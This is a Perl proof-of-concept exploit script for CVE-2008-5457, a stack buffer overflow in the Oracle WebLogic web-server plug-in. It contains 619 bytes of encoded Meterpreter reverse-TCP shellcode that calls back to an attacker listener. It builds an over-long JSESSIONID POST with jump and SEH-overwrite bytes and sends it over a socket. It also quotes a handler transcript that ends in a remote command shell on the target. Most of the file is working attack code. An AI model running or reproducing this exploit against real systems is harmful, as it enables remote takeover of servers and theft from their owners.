
weblogic-overflow.txt

Posted on 01 April 2009

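#!/usr/bin/perl
#
# No point in keeping this private anymore!
#
# k`sOSe - 02/16/2009 - CVE-2008-5457
# Tested on w2k sp4 and w2k3 R2 sp2 (no NX)
#
# Proof-of-concept for CVE-2008-5457.  A single over-long POST whose
# ";JSESSIONID=" path parameter overruns a stack buffer in the WebLogic
# web-server plug-in; the two jumps at the end of the buffer route execution
# back into the shellcode and the last two bytes partially overwrite an SEH
# record ("SEH partial rewrite" in the author's words).  Execution from the
# stack is required, hence the "no NX" qualifier above.  The shell in the
# transcript below opens in the IIS directory, which suggests the IIS
# flavour of the plug-in was the target.  Use only against systems you are
# authorised to test.
#
# NOTE(review): the published copy of this script had lost every backslash
# ("\x.." byte escapes, "\r\n" line terminators, the "c:\windows" path in
# the transcript).  They are restored here.  The restored shellcode is
# exactly 619 bytes, matching the encoder output quoted below; the CRLF
# placement follows HTTP/1.0 and should be confirmed against the original.
#
# cohelet framework-3.2
# ./msfcli multi/handler PAYLOAD=windows/reflectivemeterpreter/reverse_tcp LHOST=10.10.10.1 LPORT=80 E
# [*] Please wait while we load the module tree...
# [*] Handler binding to LHOST 0.0.0.0
# [*] Started reverse handler
# [*] Starting the payload handler...
# [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
# [*] Sending stage (75776 bytes)
# [*] Meterpreter session 1 opened (10.10.10.1:80 -> 10.10.10.4:2171)
#
# meterpreter > rev2self
# meterpreter > execute -i -f cmd.exe
# Process 3092 created.
# Channel 1 created.
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# c:\windows\system32\inetsrv>

use strict;
use warnings;
use IO::Socket::INET;

# Target defaults are the ones from the original session; override with
# "script.pl HOST PORT".  The call-back address (LHOST 10.10.10.1:80) is
# baked into the encoded shellcode and can only be changed by regenerating
# the payload.
my $target_host = defined $ARGV[0] ? $ARGV[0] : '10.10.10.4';
my $target_port = defined $ARGV[1] ? $ARGV[1] : 80;

# Layout of the JSESSIONID value, offsets in bytes from its first byte:
#   0    .. 5131   filler ("B")
#   5132 .. 8131   shellcode, padded with "C" to exactly 3000 bytes
#   8132 .. 8136   e9 43 f4 ff ff = jmp rel32 -3005, which lands on byte 5132,
#                  the first byte of the shellcode
#   8137 .. 8140   nop, nop, eb f7 = jmp short -9, which lands on the rel32 jmp
#   8141 .. 8142   two bytes written over the SEH record (partial overwrite)
# The filler size and the 3000-byte shellcode window therefore fix the
# jump distances; changing one without the other breaks the chain.
use constant FILLER_LEN     => 5132;
use constant SHELLCODE_ROOM => 3000;
use constant BODY_LEN       => 81;

# LHOST=10.10.10.1 LPORT=80
# windows/reflectivemeterpreter/reverse_tcp
# [*] x86/alpha_mixed succeeded, final size 619
my $shellcode =
    "\xd9\xec\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49" .
    "\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a" .
    "\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .
    "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .
    "\x75\x4a\x49\x4b\x4c\x4b\x58\x46\x36\x45\x50\x45\x50\x43" .
    "\x30\x50\x53\x46\x35\x51\x46\x51\x47\x4c\x4b\x42\x4c\x47" .
    "\x54\x44\x58\x4c\x4b\x50\x45\x47\x4c\x4c\x4b\x51\x44\x43" .
    "\x35\x44\x38\x45\x51\x4b\x5a\x4c\x4b\x50\x4a\x45\x48\x4c" .
    "\x4b\x51\x4a\x47\x50\x43\x31\x4a\x4b\x4b\x53\x50\x32\x51" .
    "\x59\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x50\x31\x4b" .
    "\x4f\x4b\x4c\x50\x31\x49\x50\x4e\x4c\x47\x48\x4d\x30\x43" .
    "\x44\x44\x47\x49\x51\x48\x4f\x44\x4d\x43\x31\x49\x57\x4a" .
    "\x4b\x4b\x42\x47\x4b\x43\x4c\x47\x54\x42\x34\x44\x35\x4b" .
    "\x51\x4c\x4b\x51\x4a\x47\x54\x45\x51\x4a\x4b\x43\x56\x4c" .
    "\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x45\x51\x4a" .
    "\x4b\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x4a\x48\x4a\x4b\x43" .
    "\x32\x50\x31\x49\x50\x51\x4f\x51\x4e\x51\x4d\x51\x4b\x48" .
    "\x42\x45\x58\x43\x30\x51\x4e\x42\x4a\x46\x50\x51\x49\x43" .
    "\x54\x4c\x4b\x42\x39\x4c\x4b\x51\x4b\x44\x4c\x4c\x4b\x51" .
    "\x4b\x45\x4c\x4c\x4b\x45\x4b\x4c\x4b\x51\x4b\x44\x48\x51" .
    "\x43\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x4b\x4f\x4e" .
    "\x36\x4d\x59\x48\x47\x46\x33\x45\x38\x46\x34\x48\x4a\x4e" .
    "\x4f\x4c\x51\x4b\x4f\x49\x46\x4d\x51\x4a\x4c\x45\x50\x43" .
    "\x31\x43\x30\x45\x50\x50\x50\x46\x37\x46\x36\x51\x43\x4d" .
    "\x59\x4d\x35\x4d\x38\x45\x4f\x43\x30\x45\x50\x43\x30\x4a" .
    "\x30\x43\x31\x43\x30\x45\x50\x48\x36\x45\x49\x42\x38\x4d" .
    "\x37\x49\x34\x42\x39\x42\x50\x4d\x39\x4a\x4c\x4c\x39\x4e" .
    "\x4a\x43\x50\x48\x59\x45\x59\x4a\x55\x4e\x4d\x48\x4b\x4a" .
    "\x4d\x4b\x4c\x47\x4b\x51\x47\x50\x53\x46\x52\x51\x4f\x46" .
    "\x53\x46\x52\x45\x50\x51\x4b\x4c\x4d\x50\x4b\x42\x38\x46" .
    "\x31\x4b\x4f\x48\x57\x4b\x39\x49\x4f\x4b\x39\x48\x43\x4c" .
    "\x4d\x44\x35\x44\x54\x43\x5a\x45\x55\x50\x59\x46\x31\x46" .
    "\x33\x4b\x4f\x46\x54\x4c\x4f\x4b\x4f\x50\x55\x44\x44\x51" .
    "\x49\x4c\x49\x44\x44\x4c\x4e\x4b\x52\x4b\x42\x46\x4b\x47" .
    "\x57\x50\x54\x4b\x4f\x50\x37\x4b\x4f\x46\x35\x51\x38\x46" .
    "\x51\x49\x50\x50\x50\x46\x30\x46\x30\x46\x30\x47\x30\x46" .
    "\x30\x47\x30\x50\x50\x4b\x4f\x51\x45\x51\x34\x4b\x39\x48" .
    "\x47\x45\x38\x44\x4a\x45\x5a\x44\x4a\x45\x51\x43\x58\x44" .
    "\x42\x45\x50\x45\x50\x46\x30\x4b\x39\x4d\x31\x43\x5a\x42" .
    "\x30\x46\x31\x51\x47\x4b\x4f\x50\x55\x51\x30\x43\x5a\x51" .
    "\x50\x51\x4e\x46\x36\x49\x51\x4a\x46\x45\x56\x51\x46\x49" .
    "\x51\x4a\x46\x44\x48\x46\x36\x43\x5a\x45\x50\x4b\x4f\x46" .
    "\x35\x44\x4c\x4d\x59\x49\x53\x42\x4a\x43\x30\x50\x56\x51" .
    "\x43\x50\x57\x4b\x4f\x46\x35\x44\x58\x4b\x4f\x48\x53\x44" .
    "\x4a\x41\x41";

# Build the complete HTTP request for the given shellcode and return it as a
# byte string.  Kept separate from the network code so the payload can be
# inspected (or dumped to a file) without sending it.
#
# Dies if the shellcode does not fit in the 3000-byte window: Perl silently
# turns a negative repeat count into an empty string, which would shift the
# jumps and the SEH bytes and quietly break the exploit.
sub build_request {
    my ($sc) = @_;

    my $pad_len = SHELLCODE_ROOM - length $sc;
    die sprintf("shellcode is %d bytes, window is %d\n", length $sc, SHELLCODE_ROOM)
        if $pad_len < 0;

    my $body = "A" x BODY_LEN;

    return "POST /index.jsp?;JSESSIONID="
        . "B" x FILLER_LEN
        . $sc
        . "C" x $pad_len
        . "\xe9\x43\xf4\xff\xff"   # jmp back (rel32 -3005 -> shellcode start)
        . "\x90\x90\xeb\xf7"       # jmp back (short -9 -> the rel32 jmp)
        . "\x76\x79"               # SEH partial rewrite
        . " HTTP/1.0\r\n"
        . "Connection:Keep-Alive\r\n"
        . "Content-Length: " . BODY_LEN . "\r\n\r\n"   # CRLF count: TODO confirm against original
        . $body
        . "\r\n";
}

# Send the request only when executed as a script, so the file can be loaded
# (e.g. by a test) without touching the network.  Errors are reported
# explicitly instead of dying on an undefined socket handle.
unless (caller) {
    my $sock = IO::Socket::INET->new(
        PeerAddr => $target_host,
        PeerPort => $target_port,
        Proto    => 'tcp',
        Timeout  => 10,
    ) or die "connect to $target_host:$target_port failed: $@\n";

    print {$sock} build_request($shellcode)
        or die "send to $target_host:$target_port failed: $!\n";
    close $sock or die "close failed: $!\n";
}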

 
